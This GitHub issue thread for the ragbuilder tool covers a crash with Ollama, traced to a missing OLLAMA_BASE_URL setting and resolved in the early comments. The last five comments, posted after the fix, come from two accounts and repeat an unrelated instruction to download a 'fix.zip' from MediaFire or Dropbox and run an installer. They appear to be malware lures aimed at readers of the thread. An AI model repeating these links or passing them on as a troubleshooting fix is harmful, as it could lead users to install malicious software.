### ISSUE TITLE
Doesn't run when using ollama

### ISSUE THREAD

**Issue by jhandl** [KruxAI/ragbuilder#24]
Fresh install of both ollama and ragbuilder, running on macOS Sonoma 14.6.1.
Ran `ollama pull mistral` beforehand. I then start ragbuilder, configure everything to use ollama mistral, and it immediately fails:

```
jhandl@MacBook-Pro ~ % ragbuilder 
[INFO] 2024-08-25 10:51:38 - common.py - USER_AGENT environment variable not set, consider setting it to identify your requests.
[INFO] 2024-08-25 10:51:55 - common.py - USER_AGENT environment variable not set, consider setting it to identify your requests.
[INFO] 2024-08-25 10:51:58 - ragbuilder.py - LOG_FILENAME = /Users/jhandl/logs/2024-08-25_10-51-37.log
[INFO] 2024-08-25 10:51:58 - common.py - INFO:     Started server process [56236]
[INFO] 2024-08-25 10:51:58 - common.py - INFO:     Waiting for application startup.
[INFO] 2024-08-25 10:51:58 - common.py - INFO:     Application startup complete.
[INFO] 2024-08-25 10:51:58 - common.py - INFO:     Uvicorn running on http://0.0.0.0:8005 (Press CTRL+C to quit)
[INFO] 2024-08-25 10:51:59 - common.py - INFO:     127.0.0.1:61607 - "GET / HTTP/1.1" 200 OK
[INFO] 2024-08-25 10:51:59 - common.py - INFO:     127.0.0.1:61607 - "GET /static/main.js HTTP/1.1" 200 OK
[INFO] 2024-08-25 10:51:59 - common.py - INFO:     127.0.0.1:61607 - "GET /static/ragbuilder_light.png HTTP/1.1" 200 OK
[INFO] 2024-08-25 10:52:48 - common.py - INFO:     127.0.0.1:61620 - "POST /check_source_data HTTP/1.1" 200 OK
[INFO] 2024-08-25 10:52:50 - common.py - INFO:     127.0.0.1:61620 - "POST /check_source_data HTTP/1.1" 200 OK
[INFO] 2024-08-25 10:52:50 - common.py - INFO:     127.0.0.1:61622 - "GET /templates HTTP/1.1" 200 OK
[INFO] 2024-08-25 10:52:50 - loader.py - classify_path Invoked
[INFO] 2024-08-25 10:52:50 - common.py - INFO:     127.0.0.1:61621 - "POST /check_test_data HTTP/1.1" 200 OK
[INFO] 2024-08-25 10:54:40 - ragbuilder.py - enable_analytics = True
[INFO] 2024-08-25 10:54:41 - ragbuilder.py - Initiating parsing config: {'description': 'Test1', 'sourceData': '/Users/jhandl/tmp', 'compareTemplates': True, 'includeNonTemplated': True, 'selectedTemplates': ['semantic_chunker', 'hyde', 'hybrid_rag', 'rrf'], 'chunkingStrategy': {'MarkdownHeaderTextSplitter': False, 'HTMLHeaderTextSplitter': False, 'SemanticChunker': True, 'RecursiveCharacterTextSplitter': True, 'CharacterTextSplitter': True}, 'chunkSize': {'min': 500, 'max': 2000}, 'embeddingModel': {'OpenAI:text-embedding-3-small': False, 'OpenAI:text-embedding-3-large': False, 'OpenAI:text-embedding-ada-002': False, 'HuggingFace': False, 'AzureOAI': False, 'GoogleVertexAI': False, 'Ollama': True}, 'huggingfaceEmbeddingModel': '', 'azureOAIEmbeddingModel': '', 'googleVertexAIEmbeddingModel': '', 'ollamaEmbeddingModel': 'Ollama:mistral', 'vectorDB': 'chromaDB', 'retriever': {'vectorSimilarity': True, 'vectorMMR': True, 'bm25Retriever': True, 'multiQuery': True, 'parentDocFullDoc': True, 'parentDocLargeChunk': True}, 'topK': {'search_k_5': True, 'search_k_10': False, 'search_k_20': False}, 'contextualCompression': True, 'llm': {'OpenAI:gpt-4o-mini': False, 'OpenAI:gpt-4o': False, 'OpenAI:gpt-3.5-turbo': False, 'OpenAI:gpt-4-turbo': False, 'HuggingFace': False, 'Groq': False, 'AzureOAI': False, 'GoogleVertexAI': False, 'Ollama': True}, 'huggingfaceLLMModel': '', 'groqLLMModel': '', 'azureOAILLMModel': '', 'googleVertexAILLMModel': '', 'ollamaLLMModel': 'Ollama:mistral', 'generateSyntheticData': True, 'optimization': 'bayesianOptimization', 'evalFramework': 'RAGAS', 'evalEmbedding': 'Ollama:mistral', 'evalLLM': 'Ollama:mistral', 'sotaEmbeddingModel': 'Ollama:mistral', 'sotaLLMModel': 'Ollama:mistral', 'compressors': {'LongContextReorder': True, 'CrossEncoderReranker': True, 'EmbeddingsRedundantFilter': False, 'EmbeddingsClusteringFilter': False, 'LLMChainFilter': False}, 'syntheticDataGeneration': {'testSize': '20', 'criticLLM': 'Ollama:mistral', 'generatorLLM': 'Ollama:mistral', 'generatorEmbedding': 'Ollama:mistral'}, 'testDataPath': None, 'existingSynthDataPath': None, 'testSize': None, 'criticLLM': None, 'generatorLLM': None, 'generatorEmbedding': None, 'numRuns': '50'}
[INFO] 2024-08-25 10:54:41 - ragbuilder.py - Disabled options: ['EmbeddingsRedundantFilter', 'EmbeddingsClusteringFilter', 'LLMChainFilter', 'OpenAI:gpt-4o-mini', 'OpenAI:gpt-4o', 'OpenAI:gpt-3.5-turbo', 'OpenAI:gpt-4-turbo', 'HuggingFace', 'Groq', 'AzureOAI', 'GoogleVertexAI', 'search_k_10', 'search_k_20', 'OpenAI:text-embedding-3-small', 'OpenAI:text-embedding-3-large', 'OpenAI:text-embedding-ada-002', 'HuggingFace', 'AzureOAI', 'GoogleVertexAI', 'MarkdownHeaderTextSplitter', 'HTMLHeaderTextSplitter']
[INFO] 2024-08-25 10:54:41 - llmConfig.py - LLM Invoked
[INFO] 2024-08-25 10:54:41 - llmConfig.py - LLM Code Gen Invoked: Ollama:mistral
[INFO] 2024-08-25 10:54:41 - common.py - INFO:     127.0.0.1:61639 - "POST /rbuilder HTTP/1.1" 500 Internal Server Error
[INFO] 2024-08-25 10:54:41 - common.py - ERROR:    Exception in ASGI application
[INFO] 2024-08-25 10:54:41 - common.py - Traceback (most recent call last):
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/uvicorn/protocols/http/httptools_impl.py", line 399, in run_asgi
[INFO] 2024-08-25 10:54:41 - common.py -     result = await app(  # type: ignore[func-returns-value]
[INFO] 2024-08-25 10:54:41 - common.py -              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/uvicorn/middleware/proxy_headers.py", line 70, in __call__
[INFO] 2024-08-25 10:54:41 - common.py -     return await self.app(scope, receive, send)
[INFO] 2024-08-25 10:54:41 - common.py -            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/fastapi/applications.py", line 1054, in __call__
[INFO] 2024-08-25 10:54:41 - common.py -     await super().__call__(scope, receive, send)
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/starlette/applications.py", line 123, in __call__
[INFO] 2024-08-25 10:54:41 - common.py -     await self.middleware_stack(scope, receive, send)
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/starlette/middleware/errors.py", line 186, in __call__
[INFO] 2024-08-25 10:54:41 - common.py -     raise exc
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/starlette/middleware/errors.py", line 164, in __call__
[INFO] 2024-08-25 10:54:41 - common.py -     await self.app(scope, receive, _send)
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/starlette/middleware/exceptions.py", line 65, in __call__
[INFO] 2024-08-25 10:54:41 - common.py -     await wrap_app_handling_exceptions(self.app, conn)(scope, receive, send)
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/starlette/_exception_handler.py", line 64, in wrapped_app
[INFO] 2024-08-25 10:54:41 - common.py -     raise exc
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/starlette/_exception_handler.py", line 53, in wrapped_app
[INFO] 2024-08-25 10:54:41 - common.py -     await app(scope, receive, sender)
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/starlette/routing.py", line 754, in __call__
[INFO] 2024-08-25 10:54:41 - common.py -     await self.middleware_stack(scope, receive, send)
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/starlette/routing.py", line 774, in app
[INFO] 2024-08-25 10:54:41 - common.py -     await route.handle(scope, receive, send)
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/starlette/routing.py", line 295, in handle
[INFO] 2024-08-25 10:54:41 - common.py -     await self.app(scope, receive, send)
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/starlette/routing.py", line 77, in app
[INFO] 2024-08-25 10:54:41 - common.py -     await wrap_app_handling_exceptions(app, request)(scope, receive, send)
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/starlette/_exception_handler.py", line 64, in wrapped_app
[INFO] 2024-08-25 10:54:41 - common.py -     raise exc
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/starlette/_exception_handler.py", line 53, in wrapped_app
[INFO] 2024-08-25 10:54:41 - common.py -     await app(scope, receive, sender)
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/starlette/routing.py", line 74, in app
[INFO] 2024-08-25 10:54:41 - common.py -     response = await f(request)
[INFO] 2024-08-25 10:54:41 - common.py -                ^^^^^^^^^^^^^^^^
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/fastapi/routing.py", line 297, in app
[INFO] 2024-08-25 10:54:41 - common.py -     raw_response = await run_endpoint_function(
[INFO] 2024-08-25 10:54:41 - common.py -                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/fastapi/routing.py", line 212, in run_endpoint_function
[INFO] 2024-08-25 10:54:41 - common.py -     return await run_in_threadpool(dependant.call, **values)
[INFO] 2024-08-25 10:54:41 - common.py -            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/starlette/concurrency.py", line 42, in run_in_threadpool
[INFO] 2024-08-25 10:54:41 - common.py -     return await anyio.to_thread.run_sync(func, *args)
[INFO] 2024-08-25 10:54:41 - common.py -            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/anyio/to_thread.py", line 56, in run_sync
[INFO] 2024-08-25 10:54:41 - common.py -     return await get_async_backend().run_sync_in_worker_thread(
[INFO] 2024-08-25 10:54:41 - common.py -            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/anyio/_backends/_asyncio.py", line 2177, in run_sync_in_worker_thread
[INFO] 2024-08-25 10:54:41 - common.py -     return await future
[INFO] 2024-08-25 10:54:41 - common.py -            ^^^^^^^^^^^^
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/anyio/_backends/_asyncio.py", line 859, in run
[INFO] 2024-08-25 10:54:41 - common.py -     result = context.run(func, *args)
[INFO] 2024-08-25 10:54:41 - common.py -              ^^^^^^^^^^^^^^^^^^^^^^^^
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/ragbuilder/ragbuilder.py", line 324, in rbuilder_route
[INFO] 2024-08-25 10:54:41 - common.py -     result = parse_config(project_data.model_dump(), db)
[INFO] 2024-08-25 10:54:41 - common.py -              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/ragbuilder/ragbuilder.py", line 426, in parse_config
[INFO] 2024-08-25 10:54:41 - common.py -     critic_llm=get_model_obj('llm', config["syntheticDataGeneration"]["criticLLM"], temperature = 0.2)
[INFO] 2024-08-25 10:54:41 - common.py -                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/ragbuilder/executor.py", line 107, in get_model_obj
[INFO] 2024-08-25 10:54:41 - common.py -     exec(code_str, None, locals_dict)
[INFO] 2024-08-25 10:54:41 - common.py -   File "<string>", line 4, in <module>
[INFO] 2024-08-25 10:54:41 - common.py -   File "/Users/jhandl/.local/pipx/venvs/ragbuilder/lib/python3.12/site-packages/pydantic/v1/main.py", line 341, in __init__
[INFO] 2024-08-25 10:54:41 - common.py -     raise validation_error
[INFO] 2024-08-25 10:54:41 - common.py - pydantic.v1.error_wrappers.ValidationError: 1 validation error for Ollama
[INFO] 2024-08-25 10:54:41 - common.py - base_url
[INFO] 2024-08-25 10:54:41 - common.py -   none is not an allowed value (type=type_error.none.not_allowed)
```

**Comment by ashwinzyx** [comment]
@jhandl , Does you .env have this entry OLLAMA_BASE_URL=http://localhost:11434   OR http://host.docker.internal:11434(if you are running ragbuilder os docker)

**Comment by jhandl** [comment]
It didn't. Now it does and it's runnig. Thanks for the quick response!

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
